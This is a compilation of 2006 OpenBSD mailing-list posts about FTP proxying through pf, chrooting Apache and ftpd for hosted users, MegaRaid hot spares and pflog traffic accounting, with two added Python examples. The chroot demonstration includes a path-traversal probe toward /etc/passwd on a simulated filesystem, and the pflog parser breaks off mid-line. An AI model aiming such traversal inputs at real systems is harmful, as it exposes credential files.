From thinking about it more, it's just simpler to track which IP address belongs to which login, and then when that user tries to login on a second client, the first one is barred access. This only allows one IP address per client. It does mean that the IP tracking software needs to know a little more about the IP address that it created, and requires to be a bit more actively managed.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: pftpx
On 25 May 2006, at 21:35, Peter Fraser wrote:

> The nice thing about pftpx -- it is symmetrical

Yes, hence my question, and happiness that it replaced ftp-proxy. Where am I going wrong here? (pf rules and config to be found below).

On 25 May 2006, at 21:42, Spruell, Darren-Perot wrote:

> I wonder if the -R option to ftp-proxy(8) is of help to you?

I have tried this, with no success. It gets me no further than described below.

On 26 May 2006, at 07:35, Camiel Dobbelaar wrote:

> You have to run two instances of the proxy. One as normal that listens on the default port 8021 that your internal clients can use. And another one that you will force to one server.

Outbound FTP access is not a problem, it's only inbound that I need to provide access for. The problem is that it looks like ftp-proxy isn't putting the rules in to allow the incoming data connections. When I ftp from home (the username in question is in /etc/ftpchroot):

331 Password required for gaby.
Password:
230 User gaby logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||56060|)
435 Can't build data connection: No such file or directory.
ftp>

And I see in the debug log of ftp-proxy (running ftp-proxy -d -D6) when I type the ls command:

#1 FTP session 1/100 started: client my.ip to server my.ip via proxy my.ip
#1 passive: client to server port 56777 via port 56060

my.ip is the same in each case; the firewall, proxy and ftp server are running on the same machine. My aim here is to not open a load of ports for ftpd, but to have the pftpx part of ftp-proxy only open the ports on demand.

Here's my entire pf ruleset, so I'm not doing anything fancy here:

ext_if=em0
ext_ip=my.ip

scrub in

nat-anchor ftp-proxy/*
rdr-anchor ftp-proxy/*
rdr pass on $ext_if proto tcp from any to $ext_ip port 21 -> 127.0.0.1 port 8021

anchor ftp-proxy/*
block in on $ext_if
pass in on $ext_if proto tcp to ($ext_if) port ssh keep state
pass in on $ext_if proto udp to ($ext_if) port domain keep state
pass out keep state

And for the purposes of testing I run:

ftp-proxy -d -D6

It parses fine for the moment, but I can't use FTP through it. I was really hoping pftpx would do the job, but it's just not having it. Any suggestions?

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: pftpx
On 26 May 2006, at 11:31, Camiel Dobbelaar wrote:

> Ah right, running the proxy and server on the same machine is not supported.

I see. What about running them on separate IP addresses (both still on the same machine)? Or do they need to be on different physical interfaces? Should I use a separate package, such as ftpsesame? Is there any way round this problem?

I'm curious though, what prevents them from being run on the same machine?

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
pftpx
Hi, The last mention of this on misc@ was march, and not much prior to that. Does anybody have any good/bad experiences with pftpx? I plan to use it to proxy incoming FTP connections, the opposite of what I'd use ftp-proxy for... Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: pftpx
On 25 May 2006, at 20:49, Ray Lai wrote:

> On Thu, May 25, 2006 at 08:28:12PM +0100, Gaby vanhegan wrote:
>> The last mention of this on misc@ was march, and not much prior to that. Does anybody have any good/bad experiences with pftpx? I plan to use it to proxy incoming FTP connections, the opposite of what I'd use ftp-proxy for...
>
> It's been imported as the new ftp-proxy:
> http://marc.theaimsgroup.com/?m=111708277030478

This is good news. However, I can't get the configuration correct to allow me to put an FTP server behind a PF firewall, and allow inbound client connections. The documentation says that ftp-proxy is for the opposite, ftp clients behind a firewall accessing ftp servers in the outside world.

Is there a working pf.conf that anyone can share with me? I can connect to the server but PASV mode fails with the normal error that it can't make the data connection.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: PHP vs Mason vs Ruby vs JSP/Tomcat
On 23 May 2006, at 22:10, L. V. Lammert wrote:

>> Being interpreted is certainly part of the problem. Quickly compiled languages like python, perl and pike are significantly faster, while still being very dynamic and flexible.
>
> RoR uses fastcgi, .. which is just as fast as Perl or Python.

It also has two modes, development and production. Development mode reloads everything, every time, so it picks up any changes you make to the code. Production mode caches as much as possible, and runs a lot faster than development mode.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: New server
On 20 May 2006, at 00:44, Stuart Henderson wrote:

> move the files under /var/www, and nfs mount to 127.0.0.1 back into the homes? you probably want to look at amd for this. of course the ftpd could sit on another machine if you want.

This means that I'd need an nfs mount point for each website running on that machine (a lot more than 80), and also requiring the use of nfs.

> moving the whole homes under /var/www is simpler and presumably more robust, of course... and hey, it's only 80.

Which defeats the object of what I'm trying to achieve; users' websites (and only their websites) are inside the apache chroot, so in the event of a php or apache exploit, only their websites are exposed, not their entire home directory or Maildir.

Something's got to give here. I suspect that I'm going to have to un-chroot the ftp daemon. Is there an ftpd somewhere that can prevent users from looking at certain directories? For example, I would like to limit access only to /home/username and /var/www/home/username in ftpd, and prevent access to places like /etc, /usr/local, and so on.

Gaby
-- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
LSI MegaRaid non-hotspare
Hi,

As mentioned before, I have a new server with the LSI MegaRaid SATA150-4 card. All works nicely at the moment, bar a slight problem with hot-spares.

We configured a RAID-5 array with three 250Gb drives and one hot spare. We simulated a failure by yanking the cable out from drive 2, and the alarm went off, bioctl allowed us to silence it, and showed that the array was rebuilding, onto disk 3. The rebuild process took about 9 hours (64bit card in a 32bit slot). We put the drive back in, and bioctl showed the drive as Unused. So we try to promote that drive back to a hot spare, but the bioctl command:

# bioctl -H 0:2.0 ami0

Seems to return nothing, nor does it make the change. We tried rebooting, but there's no change, and the command still does the same. When we boot into the MegaRaid config utility on the card's BIOS, it shows the drive as a hot spare, whereas bioctl still reports it as unused.

# bioctl -Dhiv ami0
bioctl: cookie = 0xd2882ca0
bio_inq
Volume  Status     Size   Device
 ami0 0 Online     468G   sd0 RAID5
      0 Online     234G   0:0.0 noencl Maxtor 6V250F0 VA11 'V5075JFG'
      1 Online     234G   0:1.0 noencl Maxtor 6V250F0 VA11 'V5075JVG'
      2 Online     234G   0:3.0 noencl Maxtor 6V250F0 VA11 'V5064EEG'
 ami0 1 Unused     234G   0:2.0 noencl Maxtor 6V250F0 VA11 'V5075LQG'

# bioctl -Dhiv -H 0:2.0 ami0
bioctl: cookie = 0xd2882ca0
bio_inq
Volume  Status     Size   Device
 ami0 0 Online     468G   sd0 RAID5
      0 Online     234G   0:0.0 noencl Maxtor 6V250F0 VA11 'V5075JFG'
      1 Online     234G   0:1.0 noencl Maxtor 6V250F0 VA11 'V5075JVG'
      2 Online     234G   0:3.0 noencl Maxtor 6V250F0 VA11 'V5064EEG'
 ami0 1 Unused     234G   0:2.0 noencl Maxtor 6V250F0 VA11 'V5075LQG'

Any suggestions? In order to get the kernel to boot we had to disable pcibios using config, which we did on a copy of bsd.mp. We took a backup of the fresh bsd.mp.

Here's a dmesg:

OpenBSD 3.9 (GENERIC.MP) #598: Thu Mar 2 02:37:06 MST 2006
    [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP
cpu0: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID
real mem = 2146541568 (2096232K)
avail mem = 1952505856 (1906744K)
using 4278 buffers containing 107429888 bytes (104912K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 10/30/05, BIOS32 rev. 0 @ 0xf0010
apm0 at bios0: Power Management spec V1.2
apm0: AC on, battery charge unknown
apm0: flags 30102 dobusy 0 doidle 1
pcibios at bios0 function 0x1a not configured
bios0: ROM list: 0xc/0x8000 0xc8000/0x2200
mainbus0: Intel MP Specification (Version 1.1) (INTELPremium )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: apic clock running at 133 MHz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz
cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID
mainbus0: bus 0 is type PCI
mainbus0: bus 1 is type PCI
mainbus0: bus 2 is type PCI
mainbus0: bus 3 is type PCI
mainbus0: bus 4 is type PCI
mainbus0: bus 5 is type ISA
ioapic0 at mainbus0: apid 2 pa 0xfec0, version 20, 24 pins
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 Intel 82955X MCH rev 0x81
ppb0 at pci0 dev 28 function 0 Intel 82801GB PCIE rev 0x01
pci1 at ppb0 bus 4
ppb1 at pci0 dev 28 function 4 Intel 82801G PCIE rev 0x01
pci2 at ppb1 bus 3
em0 at pci2 dev 0 function 0 Intel PRO/1000MT (82573L) rev 0x00: apic 2 int 16 (irq 11), address 00:15:f2:c8:8e:10
ppb2 at pci0 dev 28 function 5 Intel 82801G PCIE rev 0x01
pci3 at ppb2 bus 2
CMD Technology SiI3132 SATA rev 0x01 at pci3 dev 0 function 0 not configured
uhci0 at pci0 dev 29 function 0 Intel 82801GB USB rev 0x01: apic 2 int 20 (irq 10)
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
uhci1 at pci0 dev 29 function 1 Intel 82801GB USB rev 0x01: apic 2 int 17 (irq 10)
usb1 at uhci1: USB revision 1.0
uhub1 at usb1
uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub1: 2 ports with 2 removable, self powered
Re: New server
On 20 May 2006, at 15:15, Joachim Schipper wrote:

Something's got to give here. I suspect that I'm going to have to un-chroot the ftp daemon. Is there an ftpd somewhere that can prevent users from looking at certain directories? For example, I would like to limit access only to /home/username and /var/www/home/username in ftpd, and prevent access to places like /etc, /usr/local, and so on.

A lot of FTP daemons can do that, but I don't really see the point. The protections they offer might or might not be circumventable, but nothing interesting should be readable anyway.

If the ftpd runs as the UID of the person that's logged in, they won't be able to access the files they don't own anyway (contents of /etc, and others). But if possible, I'd just like to hide them from view, so they can't even be read. For example,

# ls -lFa /etc | grep passwd
-rw-------  1 root  wheel  2688 May 19 21:57 master.passwd
-rw-r--r--  1 root  wheel  2235 May 19 21:57 passwd

Would still result in somebody with FTP access being able to download a list of users on the system. I would like to prevent them from doing that if possible.

Anyway, ISTR that ProFTPd could do that; I'm quite certain neither stock ftpd nor vsftpd can.

I hear that the security record of ProFTPd is not stellar, to say the least. I'm fairly sure that the stock ftpd can't, and I can't find anything in pure-ftpd about it either.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: LSI MegaRaid non-hotspare
On 20 May 2006, at 16:28, Marco Peereboom wrote:

I fixed this in current. You can simply just upgrade the ami files to -current and build a 3.9 that is mostly RELEASE.

Was it a functional problem or just a cosmetic one? If I leave it as it is, is it going to cause any real problems for me?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: New server
On 20 May 2006, at 17:56, Pancho Cole wrote:

I use Pro FTP to chroot users to their home directories. see http://www.proftpd.org/

Yes, but the point is they also need to access another directory, owned by them, but well outside of that chroot, all under one login. Not using pro-ftpd, I can't allow ftp access in a chroot to all the files a user needs.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
New server
Hi,

I have a new server (2.66Ghz Core Duo) with a spangly new LSI MegaRaid card (disable pcibios made it boot happily using bsd.mp), and once we'd found the broken stick of RAM everything's happy (dmesg at end).

I have a systems question, relating to apache. I would like to run apache chrooted, but users need access to both their home directories in /home, and their web directory in /var/www/home/wherever. Ideally I'd like to do this under one login per user, but I can't think how to set up the system so they can access /home, and their chrooted area with one account.

I don't want to put the entire /home partition into the chroot, that leaves everybody's files vulnerable if apache/php gets haxored. I could just keep each user's websites folder in the chroot, but then sftpd or ftpd (both chrooted) won't be able to see them either.

I can't think of a way round this, to have chrooted access, with files in separate locations, accessible under one login. Does anybody have any suggestions?

Many thanks,

Gaby

And as promised, a dmesg from my new system:

OpenBSD 3.9 (GENERIC.MP) #598: Thu Mar 2 02:37:06 MST 2006
    [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP
cpu0: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID
real mem = 2146541568 (2096232K)
avail mem = 1952505856 (1906744K)
using 4278 buffers containing 107429888 bytes (104912K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 10/30/05, BIOS32 rev. 0 @ 0xf0010
apm0 at bios0: Power Management spec V1.2
apm0: AC on, battery charge unknown
apm0: flags 30102 dobusy 0 doidle 1
pcibios at bios0 function 0x1a not configured
bios0: ROM list: 0xc/0x8000 0xc8000/0x2200
mainbus0: Intel MP Specification (Version 1.1) (INTELPremium )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: apic clock running at 133 MHz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz
cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID
mainbus0: bus 0 is type PCI
mainbus0: bus 1 is type PCI
mainbus0: bus 2 is type PCI
mainbus0: bus 3 is type PCI
mainbus0: bus 4 is type PCI
mainbus0: bus 5 is type ISA
ioapic0 at mainbus0: apid 2 pa 0xfec0, version 20, 24 pins
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 Intel 82955X MCH rev 0x81
ppb0 at pci0 dev 28 function 0 Intel 82801GB PCIE rev 0x01
pci1 at ppb0 bus 4
ppb1 at pci0 dev 28 function 4 Intel 82801G PCIE rev 0x01
pci2 at ppb1 bus 3
em0 at pci2 dev 0 function 0 Intel PRO/1000MT (82573L) rev 0x00: apic 2 int 16 (irq 11), address 00:15:f2:c8:8e:10
ppb2 at pci0 dev 28 function 5 Intel 82801G PCIE rev 0x01
pci3 at ppb2 bus 2
CMD Technology SiI3132 SATA rev 0x01 at pci3 dev 0 function 0 not configured
uhci0 at pci0 dev 29 function 0 Intel 82801GB USB rev 0x01: apic 2 int 20 (irq 10)
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
uhci1 at pci0 dev 29 function 1 Intel 82801GB USB rev 0x01: apic 2 int 17 (irq 10)
usb1 at uhci1: USB revision 1.0
uhub1 at usb1
uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub1: 2 ports with 2 removable, self powered
uhci2 at pci0 dev 29 function 2 Intel 82801GB USB rev 0x01: apic 2 int 18 (irq 3)
usb2 at uhci2: USB revision 1.0
uhub2 at usb2
uhub2: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub2: 2 ports with 2 removable, self powered
uhci3 at pci0 dev 29 function 3 Intel 82801GB USB rev 0x01: apic 2 int 19 (irq 5)
usb3 at uhci3: USB revision 1.0
uhub3 at usb3
uhub3: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub3: 2 ports with 2 removable, self powered
ppb3 at pci0 dev 30 function 0 Intel 82801BA AGP rev 0xe1
pci4 at ppb3 bus 1
vga1 at pci4 dev 1 function 0 ATI Mach64 GU rev 0x9a
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
ami0 at pci4 dev 2 function 0 Symbios Logic MegaRAID rev 0x01: apic 2 int 23 (irq 5) LSI 523 64b/lhc
ami0: FW 713N, BIOS vG119, 64MB RAM
ami0: 1 channels, 0 FC loops, 1 logical drives
scsibus0 at ami0: 40 targets
sd0 at scsibus0 targ 0 lun 0: AMI, Host drive #00, SCSI2 0/direct fixed
sd0: 478736MB, 478736 cyl, 64 head, 32 sec, 512 bytes/sec, 980451328 sec total
scsibus1 at ami0: 16 targets
ITExpress IT8211F rev 0x11 at pci4 dev 4 function 0 not configured
skc0 at pci4 dev 5 function 0 Marvell Yukon 88E8001/8003/8010 rev 0x13, Marvell Yukon Lite (0x9): apic 2 int 21 (irq 10)
sk0 at skc0 port A, address 00:15:f2:c8:88:32
eephy0 at sk0 phy 0: Marvell 88E1011 Gigabit PHY, rev. 5
ichpcib0 at pci0 dev 31 function 0 Intel 82801GB LPC rev 0x01: PM disabled
Re: New server
On 19 May 2006, at 20:59, Nick Guenther wrote:

Would hardlinking /home into /var/www/home help? I don't know all the details of chroot so I don't know if this would work.

The basic premise is that each user has a websites folder that all their sites are in. For example, we would have /home/testuser/websites in a user's directory, and /var/www/sites/www.x.com in apache's chroot. Is it then possible to hard-link from the chroot into the home directory of the user, and that user still be able to access their files from a chrooted ftp server (such as the built-in one) or from an scp client?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: Spamd stats
On 19 May 2006, at 21:28, Mike Spenard wrote:

I'm looking for scripts to generate statistics off of /var/log/spamd

If you don't mind using rrdtool to collate the information, I have some scripts here:

http://vanhegan.net/software/

In the Misc section down the bottom, you'll find my php/rrd/spamd scripts.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: New server
On 19 May 2006, at 21:19, jared r r spiegel wrote:

i made myself a separate /var/www/htdocs/sitename partition and then make individual symlinks from ~someuser/public_html -> thatpartition/someuser

IIRC I can't write hard links across partitions, and /var and /home are on different partitions.

On 19 May 2006, at 21:25, Daniel Ouellet wrote:

Change your home directory to the /var/www, or may be link from home to var/www, not the reverse.

Unfortunately, it's not just my home directory, it's that of about 80 users, some of whom have several websites.

On 19 May 2006, at 21:30, Nick Guenther wrote:

Well all a hardlink is is a second entry in the filesystem's tables pointing at the same place on disk. It seems it should work.

Not when the hardlink spans partitions.

On 19 May 2006, at 21:52, Daniel A. Ramaley wrote:

When a user logs in, what would prevent them from accessing their files in /var/www/home/wherever by just using the cd command to change to that directory?

Because no users will be getting shell access. Either they'll be in a chrooted FTP environment, or maybe a chrooted scp environment. Everyday users won't have shell access.

Just make sure permissions on whatever they need to access in /var/www/home/wherever are such that the users can change files and Apache can read files.

The files will be owned by the user in question, as they are at the moment in each user's home directory. However, as has been pointed out before, symlinking directories isn't the way forward.

On 19 May 2006, at 21:53, Matthew S Elmore wrote:

This is how I approached the problem: Each user had a specified directory they could put files in, /var/www/users/bob or whatever. I simply set the proper permissions on that directory and did this:

# ln -s /var/www/users/bob /home/bob/public_html

That would work, and I can softlink across partitions. The only downside to this is that we'd have to shut off FTP access and restrict users to scp access only, in order to allow them to follow the links. This poses the problem of educating a large number of non-technical people, the thought of which makes me shudder (not as much as having some script kiddie punch holes in a non-chrooted php). Turning people over to scp/sftp has the downside of being non-chrooted, and ideally we'd like to chroot as much as possible...

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
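The reason the symlink approach above works for scp but not for a chrooted ftpd is how the kernel resolves an absolute link target for a process whose root directory has been changed. The following is an added example, not code from the thread: it models that lookup over a constructed directory layout matching Matthew S Elmore's `ln -s /var/www/users/bob /home/bob/public_html`. The resolver is a simplified model of namei() behaviour, not OpenBSD code, and the `FS` table is invented for the demonstration.

```python
"""Why a symlink that works for scp does not work for a chrooted ftpd.

Added example, not part of the thread.  It models path lookup the way a
kernel does it for a process with a changed root: an absolute symlink
target is resolved *under that root*, so /home/bob/public_html ->
/var/www/users/bob only works when the process's root really is "/".
"""
import posixpath

# Constructed filesystem: path -> "dir", "file" or ("symlink", target).
FS = {
    "/": "dir",
    "/home": "dir",
    "/home/bob": "dir",
    "/home/bob/public_html": ("symlink", "/var/www/users/bob"),
    "/var": "dir",
    "/var/www": "dir",
    "/var/www/users": "dir",
    "/var/www/users/bob": "dir",
    "/var/www/users/bob/index.html": "file",
}


def resolve(path, root="/", max_links=32):
    """Resolve `path` as seen by a process whose root directory is `root`.

    Returns the path on the host filesystem, or None when a component is
    missing.  Absolute symlink targets are re-rooted under `root`, and ".."
    can never climb above it, which is exactly what a chroot guarantees.
    """
    root = posixpath.normpath(root)
    parts = [p for p in path.split("/") if p]
    cur = root
    links = 0
    while parts:
        name = parts.pop(0)
        if name == ".":
            continue
        if name == "..":
            if cur != root:
                cur = posixpath.dirname(cur)
            continue
        nxt = posixpath.join(cur, name)
        entry = FS.get(nxt)
        if entry is None:
            return None
        if isinstance(entry, tuple):
            links += 1
            if links > max_links:
                raise OSError("too many levels of symbolic links")
            target = entry[1]
            if target.startswith("/"):
                cur = root      # absolute target: start over at the process root
            parts = [p for p in target.split("/") if p] + parts
            continue
        cur = nxt
    return cur


def ftp_view(user_root="/home/bob"):
    """What a chrooted ftpd (root = the user's home) finds behind public_html."""
    return resolve("/public_html/index.html", root=user_root)


def scp_view():
    """What a non-chrooted scp session finds behind the same link."""
    return resolve("/home/bob/public_html/index.html")


if __name__ == "__main__":
    print("scp (root /):  ", scp_view())
    print("chrooted ftpd: ", ftp_view())
    print("escape via ..: ", resolve("/../../etc/passwd", root="/home/bob"))
```

With the root at `/`, the link lands on `/var/www/users/bob/index.html`; with the root moved to `/home/bob`, the same link is looked up as `/home/bob/var/www/users/bob`, which does not exist, and the `..` probe shows the chroot cannot be climbed out of by path tricks either. The same resolution rule is why putting the link inside the chroot, rather than pointing out of it, is the only layout that works for both daemons.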
SFTP logging
Hi,

There's a very nice file in /var/log called xferlog, which logs all the ftp connections and files that go in and out of my machine. Very handy. Is there a similar setup available for sftp? Is there a config directive I can tweak in sshd_config or other file? Can it be extended to scp as well?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: PFlog
On 9 Apr 2006, at 18:55, Gaby vanhegan wrote:

And the winner is: pmacct.

The only problem here is that I'm running 3.6 and pmacct requires libpcap >= 0.6, and 0.3 is what I have. I can't do an upgrade at the moment, there's too many variables, but if I were to build libpcap from source, would it clobber the version that's currently installed and break other programs?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: PFlog
On 10 Apr 2006, at 17:29, Joachim Schipper wrote:

The only problem here is that I'm running 3.6 and pmacct requires libpcap >= 0.6, and 0.3 is what I have. I can't do an upgrade at the moment, there's too many variables, but if I were to build libpcap from source, would it clobber the version that's currently installed and break other programs?

The OpenBSD libpcap is a pretty heavily hacked version - most should be in it.

It appears to be missing the function pcap_open_dead(), so I presume the 3.6 libpcap version is a touch behind the 0.6 version that pmacct requires.

Of course, that looks like it's time for a port. ;-) Or just go with pfflowd, or somesuch.

I already had a nice little system setup using pmacct to dump data into an SQL db. It would seem that using pfflowd and flowd together could replace that part of the system, and the data analysis part remains the same. The only difference here is that pfflowd would capture traffic at the firewall stage, whereas pmacct captures it directly at the interface. A little more glue required, but it could be made to do the same job.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
PFlog
Hi,

I'm trying to set up a system to account for the traffic that flows through the firewall by service (http, smtp, etc). I have had some success playing with tcpdump and pf logging but I can't quite work out what's going on. I have pf logging the traffic that I want to account for so /var/log/pflog is filling up nicely. Taking a few sample lines from the output of:

# tcpdump -n -r /var/log/pflog
13:35:07.985465 220.135.151.10.1254 > 195.224.72.148.25: S 108231586:108231586(0) win 65535 <mss 1300,nop,nop,sackOK> (DF)
13:35:08.384197 195.224.72.148.59258 > 195.224.72.2.53: 28701+[|domain]
13:35:15.747376 24.198.33.0.3395 > 195.224.72.148.25: S 531328580:531328580(0) win 64240 <mss 1460,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> (DF)
13:35:18.025285 80.62.253.137.4452 > 195.224.72.148.80: S 3580612744:3580612744(0) win 65535 <mss 1452,nop,nop,sackOK> (DF)
13:35:28.544158 131.165.205.101.1886 > 195.224.72.148.80: S 2587435678:2587435678(0) win 16384 <mss 1460> (DF)
13:35:29.585572 66.154.102.108.53139 > 195.224.72.148.80: S 1452108063:1452108063(0) win 5840 <mss 1460,sackOK,timestamp 142976852 0,nop,wscale 0> (DF)
13:35:38.090762 82.153.166.67.1436 > 195.224.72.148.80: S 1406992321:1406992321(0) win 65535 <mss 1452,nop,nop,sackOK> (DF)

I can't actually work out which field in these lines is the size of the data payload for each packet. The first line looks like an SMTP connection, the last four look like HTTP connections (incoming). I've read the pflog documentation, and the tcpdump documentation but perhaps I've missed something. If I want to get packet sizes, I need to run tcpdump on the live interface (not the pflog file) with the -e flag, which, as the manual suggests:

     Link Level Headers
          If the -e option is given, the link level header is printed out. On Ethernets, the source and destination addresses, protocol, and packet length are printed.

Which gives me packet length. However, this is for all traffic, and I'm only interested in traffic that makes it through pf, or traffic that I specifically want to log via pf. I have looked at tools like symon/symux (which I'll be using for the data logging), I don't want to run ntop and iplog hasn't been touched for years. The mailing archive suggested IPAudit, but I'd rather use native tools if I can.

Do I have to listen to the interface directly (tcpdump -n ip) or can I get the packet size information from the pflog file?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
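The packet size is in the pflog file, just not in the default tcpdump summary: each logged packet still carries its IPv4 header, whose total-length field is the size on the wire. The block below is an added example, not code from the thread or from pf, that reads a pflog(4) pcap file and sums bytes per direction, action, protocol and service port. It assumes the classic pcap container with link type 117 (DLT_PFLOG) and the OpenBSD 3.x pfloghdr layout (61 real bytes padded to 64, the first byte giving the length); the capture it parses is constructed in the script so it runs offline, and the "service port is the lower of the two ports" rule is a heuristic of this example, not something pf records.

```python
"""Per-service byte accounting read directly from a pflog(4) capture file.

Added example, not part of the original thread.  pflog only keeps the first
96 bytes of each packet, so the pcap capture length under-counts every
large packet; the IPv4 total-length field is the number to sum.
"""
import struct
from collections import defaultdict

DLT_PFLOG = 117
AF_INET = 2                 # OpenBSD <sys/socket.h>
PF_IN, PF_OUT = 1, 2        # direction values from <net/pfvar.h>
PF_PASS, PF_DROP = 0, 1     # action values from <net/pfvar.h>
PFLOG_REAL_HDRLEN = 61      # hdr.length as written by the 3.x kernel
PROTO = {1: "icmp", 6: "tcp", 17: "udp"}
PCAP_MAGIC = 0xA1B2C3D4


def parse_pflog_header(buf):
    """Decode struct pfloghdr; return (aligned header length, af, action, direction)."""
    length, af, action, direction = buf[0], buf[1], buf[2], buf[60]
    hdrlen = (length + 3) & ~3          # BPF_WORDALIGN(), as tcpdump does
    return hdrlen, af, action, direction


def packet_size_and_service(pkt):
    """Return (IP total length, proto name, service port) for an IPv4 packet.

    The service port is the lower of the two ports (heuristic): 25 for inbound
    SMTP and 80 for the server's outbound HTTP replies alike.
    """
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    total_len = struct.unpack("!H", pkt[2:4])[0]
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    port = None
    if proto in (6, 17) and len(pkt) >= ihl + 4:
        sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
        port = min(sport, dport)
    return total_len, PROTO.get(proto, str(proto)), port


def summarize(pcap_bytes):
    """Map (direction, action, proto, service port) -> (packets, bytes)."""
    magic = struct.unpack("<I", pcap_bytes[:4])[0]
    if magic == PCAP_MAGIC:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(end + "I", pcap_bytes[20:24])[0]
    if linktype != DLT_PFLOG:
        raise ValueError("link type %d is not DLT_PFLOG" % linktype)
    totals = defaultdict(lambda: [0, 0])
    off = 24
    while off + 16 <= len(pcap_bytes):
        _sec, _usec, incl_len, _orig = struct.unpack(end + "IIII", pcap_bytes[off:off + 16])
        off += 16
        rec = pcap_bytes[off:off + incl_len]
        off += incl_len
        if len(rec) < 64:
            continue
        hdrlen, af, action, direction = parse_pflog_header(rec)
        if af != AF_INET:
            continue                     # IPv6 accounting left out of this example
        parsed = packet_size_and_service(rec[hdrlen:])
        if parsed is None:
            continue
        size, proto, port = parsed
        key = ({PF_IN: "in", PF_OUT: "out"}.get(direction, "?"),
               "pass" if action == PF_PASS else "block", proto, port)
        totals[key][0] += 1
        totals[key][1] += size
    return {k: tuple(v) for k, v in totals.items()}


def build_record(direction, action, proto, sport, dport, total_len):
    """Construct one pcap record: pfloghdr + truncated IPv4 packet (test data only)."""
    hdr = struct.pack("<BBBB16s16sIIIIIIB3x", PFLOG_REAL_HDRLEN, AF_INET, action, 0,
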